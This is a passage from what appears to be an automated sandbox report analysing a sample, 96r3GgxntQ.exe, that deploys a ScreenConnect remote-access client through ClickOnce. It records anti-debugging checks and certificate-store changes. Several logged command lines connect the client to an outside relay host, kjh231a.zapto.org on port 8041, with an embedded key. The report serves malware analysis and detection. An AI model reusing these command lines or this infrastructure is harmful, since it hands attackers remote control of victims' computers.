sTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXM&r=&i=Untitled%2520Session" "1"
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BB191F
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree, 0_2_00BB1000
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB3677 mov eax, dword ptr fs:[00000030h] 0_2_00BB3677
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB6893 GetProcessHeap, 0_2_00BB6893
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BB1493
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BB191F
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BB4573
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB1AAC SetUnhandledExceptionFilter, 0_2_00BB1AAC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608 Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864 Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1" Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\66zocdx0.3q8\r62k8zq0.mo3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%2520session" "1"
Source: unknown Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\66zocdx0.3q8\r62k8zq0.mo3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%2520session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\66zocdx0.3q8\r62k8zq0.mo3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%2520session" "1" Jump to behavior
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB1BD4 cpuid 0_2_00BB1BD4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe.config VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe.config VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
